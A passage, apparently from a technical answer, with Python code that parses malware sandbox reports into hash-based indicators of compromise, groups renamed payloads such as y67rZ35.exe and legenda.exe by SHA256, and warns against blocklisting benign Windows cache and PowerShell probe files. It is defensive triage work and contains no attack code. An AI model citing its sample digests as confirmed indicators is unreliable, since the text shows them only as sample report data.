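| SHA1 | eae7d4b7a9636329065877aabe8d4f721a26ab25 |
| SHA256 | c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106 |
| SHA512 | f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2 |
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
PATH_LINE = re.compile(r"^[A-Za-z]:\\")
MEM_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

DIGEST_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}


def parse_report(text):
    """Return (files, regions).

    files:   one dict per path block: {"path", "md5", "sha1", "sha256", "sha512"}
    regions: one dict per memory line: {"pid", "seq", "start", "end", "size"}
    """
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_LINE.match(line)
        if m:
            start, end = int(m.group(3), 16), int(m.group(4), 16)
            regions.append({"pid": int(m.group(1)), "seq": int(m.group(2)),
                            "start": start, "end": end, "size": end - start})
            current = None  # a memory line ends the preceding hash block
            continue
        if PATH_LINE.match(line):
            current = {"path": line}
            files.append(current)
            continue
        m = HASH_ROW.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2).lower()
    return files, regions


def dedupe_by_sha256(files):
    """Group paths by SHA256 so one payload dropped under several names is one IOC."""
    groups = defaultdict(set)
    for f in files:
        if "sha256" in f:
            groups[f["sha256"]].add(f["path"])
    return {sha: sorted(paths) for sha, paths in groups.items()}


def validate_lengths(files):
    """Flag digests whose hex length does not match the algorithm (truncated copy/paste)."""
    return [(f["path"], algo) for f in files
            for algo, n in DIGEST_LEN.items() if algo in f and len(f[algo]) != n]


def matches_ioc(data, ioc_sha256):
    """True if the SHA256 of `data` is in the IOC set (e.g. a file pulled from a host)."""
    return hashlib.sha256(data).hexdigest() in ioc_sha256


if __name__ == "__main__":
    files, regions = parse_report(SAMPLE_REPORT)
    for sha, paths in dedupe_by_sha256(files).items():
        print(sha, "->", "; ".join(paths))
    for r in regions:
        print(f"pid {r['pid']}: {r['start']:#x}-{r['end']:#x} ({r['size']} bytes)")
    print("bad digests:", validate_lengths(files))
```

Two caveats when feeding the full listing through this. First, the CryptnetUrlCache entries are Windows CryptoAPI's cache of downloaded certificate and revocation data, and `__PSScriptPolicyTest_*.ps1` is the file PowerShell writes at startup to probe script policy; both show that those components ran, but their hashes should not go onto a blocklist. Second, the identical digests for y67rZ35.exe and legenda.exe show a rename, not a second payload, which is exactly what the SHA256 grouping surfaces.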